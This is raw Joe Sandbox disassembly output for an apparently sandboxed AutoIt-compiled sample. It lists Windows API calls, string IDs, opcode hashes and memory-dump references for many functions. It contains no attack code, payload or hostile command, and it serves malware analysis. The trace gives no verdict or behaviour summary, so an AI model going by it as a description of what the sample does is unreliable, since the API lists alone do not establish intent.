                                                    • EndDialog.USER32(00000000), ref: 006B5060
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: @U=u$BUTTON
                                                    • API String ID: 1194449130-2582809321
                                                    • Opcode ID: 7854d6841a37394ef2813e51d084e4c99e28de0285229bc21ea3cee9c8bf38ad
                                                    • Instruction ID: 80e604648332c01a54b9b3bfdd6da29000110938d18429240c6073fb4e18c8f3
                                                    • Opcode Fuzzy Hash: 7854d6841a37394ef2813e51d084e4c99e28de0285229bc21ea3cee9c8bf38ad
                                                    • Instruction Fuzzy Hash: 422192F0A06604AFE7105F24EC89BE63BABEB49745B04A029F103822F1DB758D908775
                                                    APIs
                                                      • Part of subcall function 00670957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00656B0C,?,00008000), ref: 00670973
                                                      • Part of subcall function 00654750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00654743,?,?,006537AE,?), ref: 00654770
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00656BAD
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00656CFA
                                                      • Part of subcall function 0065586D: _wcscpy.LIBCMT ref: 006558A5
                                                      • Part of subcall function 0067363D: _iswctype.LIBCMT ref: 00673645
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 537147316-1018226102
                                                    • Opcode ID: c304ae5882a69b8e1737e62e3c1463f251d2d1b7537333b24c9c73b66e849cfe
                                                    • Instruction ID: 923d06cf76e55249cf8e6181e85e0677ea13b0cfe4582911942e56dfa3f2c64d
                                                    • Opcode Fuzzy Hash: c304ae5882a69b8e1737e62e3c1463f251d2d1b7537333b24c9c73b66e849cfe
                                                    • Instruction Fuzzy Hash: 2302CD701083419FC764EF20C8919AFBBF6EF99314F504A1DF88A972A1DB31DA49CB56
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2D50
                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 006B2DDD
                                                    • GetMenuItemCount.USER32(00715890), ref: 006B2E66
                                                    • DeleteMenu.USER32(00715890,00000005,00000000,000000F5,?,?), ref: 006B2EF6
                                                    • DeleteMenu.USER32(00715890,00000004,00000000), ref: 006B2EFE
                                                    • DeleteMenu.USER32(00715890,00000006,00000000), ref: 006B2F06
                                                    • DeleteMenu.USER32(00715890,00000003,00000000), ref: 006B2F0E
                                                    • GetMenuItemCount.USER32(00715890), ref: 006B2F16
                                                    • SetMenuItemInfoW.USER32(00715890,00000004,00000000,00000030), ref: 006B2F4C
                                                    • GetCursorPos.USER32(?), ref: 006B2F56
                                                    • SetForegroundWindow.USER32(00000000), ref: 006B2F5F
                                                    • TrackPopupMenuEx.USER32(00715890,00000000,?,00000000,00000000,00000000), ref: 006B2F72
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006B2F7E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 3993528054-0
                                                    • Opcode ID: 7de1892a21be7040382f04e36ccb695c4ef7fab19b916fbe0dbd52bc1b5677d3
                                                    • Instruction ID: ebeb183715afd8dd3c430e51fe734541f0a18ea019e3da943d9b2e4070fcedfa
                                                    • Opcode Fuzzy Hash: 7de1892a21be7040382f04e36ccb695c4ef7fab19b916fbe0dbd52bc1b5677d3
                                                    • Instruction Fuzzy Hash: 5D7106B0641207BAEB218F15DC65FEABFAAFF04314F14421AF615AA2E0C7719C91C754
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 006C88D7
                                                    • CoInitialize.OLE32(00000000), ref: 006C8904
                                                    • CoUninitialize.OLE32 ref: 006C890E
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 006C8A0E
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 006C8B3B
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,006E2C0C), ref: 006C8B6F
                                                    • CoGetObject.OLE32(?,00000000,006E2C0C,?), ref: 006C8B92
                                                    • SetErrorMode.KERNEL32(00000000), ref: 006C8BA5
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006C8C25
                                                    • VariantClear.OLEAUT32(?), ref: 006C8C35
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID: ,,n
                                                    • API String ID: 2395222682-1563246951
                                                    • Opcode ID: 4cbe8c0faa529bb8b0dacd88d63a52be1ac45ff84f3f3bb6b253835d58874d5b
                                                    • Instruction ID: f1cb02f380f5bcfc1d09431d3229327ce67de31c05447f31b1c6034bdae20f77
                                                    • Opcode Fuzzy Hash: 4cbe8c0faa529bb8b0dacd88d63a52be1ac45ff84f3f3bb6b253835d58874d5b
                                                    • Instruction Fuzzy Hash: C3C115B1604345AFC710DF64C884E6AB7EAFF89748F00491DF98A9B251DB71ED06CB52
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006D86FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID: @U=u$hW
                                                    • API String ID: 634782764-4076565667
                                                    • Opcode ID: 9612c4472bd6812cbaa4d95a4971ccec716e8e6b8e8f37c42fe538eff6a22926
                                                    • Instruction ID: 2cb8b270e82b451c315726ca7d9b987c5281e2ea9e3780d796a9215f8a210222
                                                    • Opcode Fuzzy Hash: 9612c4472bd6812cbaa4d95a4971ccec716e8e6b8e8f37c42fe538eff6a22926
                                                    • Instruction Fuzzy Hash: 31518030E00244BEDB249B28CC8EFAD7BA7AB05720F604157F911E73A1CB71EA80DB55
                                                    APIs
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • _memset.LIBCMT ref: 006A786B
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006A78A0
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006A78BC
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006A78D8
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006A7902
                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 006A792A
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006A7935
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006A793A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1411258926-22481851
                                                    • Opcode ID: 8517680788be807304cbbaf2b171957b1356bac30ed2da14ffd0c6635f9f999e
                                                    • Instruction ID: e31d7d1db35ff467c908612125681777ec81cbbf55c541a81416551c892a143e
                                                    • Opcode Fuzzy Hash: 8517680788be807304cbbaf2b171957b1356bac30ed2da14ffd0c6635f9f999e
                                                    • Instruction Fuzzy Hash: D7410A72C14229AACB11EB94EC55DEEB7BAFF04351F40412AE805A3261DA345E08CB94
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,006CFDAD,?,?), ref: 006D0E31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: 82a858257dc1362a0d779a4c9aaf00291f926b83f8b6ab860bc01693b52d939e
                                                    • Instruction ID: b5112c6e8b8dee00bcd68be98f911ca5676bf3fd98584b0d82b93e349e84b431
                                                    • Opcode Fuzzy Hash: 82a858257dc1362a0d779a4c9aaf00291f926b83f8b6ab860bc01693b52d939e
                                                    • Instruction Fuzzy Hash: 26415C7190028ACBEF50EF10D856AEF37A6AF11700F64446AFC551B392DB349D1ACBA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 006D716A
                                                    • CreateMenu.USER32 ref: 006D7185
                                                    • SetMenu.USER32(?,00000000), ref: 006D7194
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006D7221
                                                    • IsMenu.USER32(?), ref: 006D7237
                                                    • CreatePopupMenu.USER32 ref: 006D7241
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006D726E
                                                    • DrawMenuBar.USER32 ref: 006D7276
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0$F$hW
                                                    • API String ID: 176399719-2236178175
                                                    • Opcode ID: 736213308cefea8c922e89a4bbddc9cc7b0f716d2ae4b78a7b28d0f58f2039ba
                                                    • Instruction ID: ef326a0fd43d8a64fe3b120d1be5d266487beab998dfddf4cf7c7dae6522f10c
                                                    • Opcode Fuzzy Hash: 736213308cefea8c922e89a4bbddc9cc7b0f716d2ae4b78a7b28d0f58f2039ba
                                                    • Instruction Fuzzy Hash: E4415874A01205EFDB20DF64E884EDABBB6FF59310F14412AF906A7361E731AA10CF91
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006D755E
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 006D7565
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006D7578
                                                    • SelectObject.GDI32(00000000,00000000), ref: 006D7580
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 006D758B
                                                    • DeleteDC.GDI32(00000000), ref: 006D7594
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006D759E
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006D75B2
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006D75BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: @U=u$static
                                                    • API String ID: 2559357485-3553413495
                                                    • Opcode ID: abae23ddd9fde66697034d639e9c2cb6408fadf5343f2c3afd48693819efe03a
                                                    • Instruction ID: 1571d09ad6687204866abc6cd36cfad773ce24847d9b3614be933acb8f4bb728
                                                    • Opcode Fuzzy Hash: abae23ddd9fde66697034d639e9c2cb6408fadf5343f2c3afd48693819efe03a
                                                    • Instruction Fuzzy Hash: 0D319E32905214BBDF119F64EC08FDB3B6AFF09321F114226FA16962E0DB31D821DBA5
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0068E2A0,00000010,?,Bad directive syntax error,006DF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006AF7C2
                                                    • LoadStringW.USER32(00000000,?,0068E2A0,00000010), ref: 006AF7C9
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • _wprintf.LIBCMT ref: 006AF7FC
                                                    • __swprintf.LIBCMT ref: 006AF81E
                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006AF88D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 1506413516-4153970271
                                                    • Opcode ID: c0ea0fc7d67f140067448c682dd9bab421dcccdfbb298b2970c8d85b85d14abc
                                                    • Instruction ID: 8b45e9f8b695d1226e6eb6588b0c76d5e90ddaa9ec8e380dadf48bbd96ec9f2f
                                                    • Opcode Fuzzy Hash: c0ea0fc7d67f140067448c682dd9bab421dcccdfbb298b2970c8d85b85d14abc
                                                    • Instruction Fuzzy Hash: BF21B47180021EFFCF51EF90CC0AEED777ABF18301F04446AF915661A2DA759A18DB55
                                                    APIs
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                      • Part of subcall function 00657924: _memmove.LIBCMT ref: 006579AD
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006B5330
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006B5346
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006B5357
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006B5369
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006B537A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: e378f75177439296e4a18ebbc27072e758964b68aab64456e938ad22ee78b43b
                                                    • Instruction ID: 4dd51b7dc2ccbe6cac7ed72567213fdebe7a2e2461def28dde714d1cc3f5414f
                                                    • Opcode Fuzzy Hash: e378f75177439296e4a18ebbc27072e758964b68aab64456e938ad22ee78b43b
                                                    • Instruction Fuzzy Hash: 5F11C8B0950119B9D7A0B7A1DC49DFF7BFDEB91B41F0005197802921D1EEA00D48C675
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • CoInitialize.OLE32(00000000), ref: 006BD5EA
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006BD67D
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 006BD691
                                                    • CoCreateInstance.OLE32(006E2D7C,00000000,00000001,00708C1C,?), ref: 006BD6DD
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006BD74C
                                                    • CoTaskMemFree.OLE32(?,?), ref: 006BD7A4
                                                    • _memset.LIBCMT ref: 006BD7E1
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 006BD81D
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006BD840
                                                    • CoTaskMemFree.OLE32(00000000), ref: 006BD847
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006BD87E
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 006BD880
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 006AC283
                                                    • GetWindowRect.USER32(00000000,?), ref: 006AC295
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006AC2F3
                                                    • GetDlgItem.USER32(?,00000002), ref: 006AC2FE
                                                    • GetWindowRect.USER32(00000000,?), ref: 006AC310
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006AC364
                                                    • GetDlgItem.USER32(?,000003E9), ref: 006AC372
                                                    • GetWindowRect.USER32(00000000,?), ref: 006AC383
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006AC3C6
                                                    • GetDlgItem.USER32(?,000003EA), ref: 006AC3D4
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006AC3F1
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006AC3FE
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • GetSystemMetrics.USER32(0000000F), ref: 006DD47C
                                                    • GetSystemMetrics.USER32(0000000F), ref: 006DD49C
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 006DD6D7
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006DD6F5
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006DD716
                                                    • ShowWindow.USER32(00000003,00000000), ref: 006DD735
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006DD75A
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 006DD77D
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID: @U=u$hW
                                                    • API String ID: 1211466189-4076565667
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,006DF910), ref: 006BA90B
                                                    • GetDriveTypeW.KERNEL32(00000061,007089A0,00000061), ref: 006BA9D5
                                                    • _wcscpy.LIBCMT ref: 006BA9FF
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0068C2F7
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068C319
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0068C331
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0068C34F
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0068C370
                                                    • DestroyIcon.USER32(00000000), ref: 0068C37F
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0068C39C
                                                    • DestroyIcon.USER32(?), ref: 0068C3AB
                                                      • Part of subcall function 006DA4AF: DeleteObject.GDI32(00000000), ref: 006DA4E8
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID: @U=u
                                                    • API String ID: 2819616528-2594219639
                                                    Similarity
                                                    • API ID: __i64tow__itow__swprintf
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 421087845-2263619337
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006A9014
                                                    • GetDlgCtrlID.USER32 ref: 006A901F
                                                    • GetParent.USER32 ref: 006A903B
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 006A903E
                                                    • GetDlgCtrlID.USER32(?), ref: 006A9047
                                                    • GetParent.USER32(?), ref: 006A9063
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 006A9066
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: @U=u$ComboBox$ListBox
                                                    • API String ID: 1536045017-2258501812
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006A90FD
                                                    • GetDlgCtrlID.USER32 ref: 006A9108
                                                    • GetParent.USER32 ref: 006A9124
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 006A9127
                                                    • GetDlgCtrlID.USER32(?), ref: 006A9130
                                                    • GetParent.USER32(?), ref: 006A914C
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 006A914F
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: @U=u$ComboBox$ListBox
                                                    • API String ID: 1536045017-2258501812
                                                    APIs
                                                    • GetParent.USER32 ref: 006A916F
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 006A9184
                                                    • _wcscmp.LIBCMT ref: 006A9196
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006A9211
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-1428604138
                                                    APIs
                                                    • _memset.LIBCMT ref: 00676E3E
                                                      • Part of subcall function 00678B28: __getptd_noexit.LIBCMT ref: 00678B28
                                                    • __gmtime64_s.LIBCMT ref: 00676ED7
                                                    • __gmtime64_s.LIBCMT ref: 00676F0D
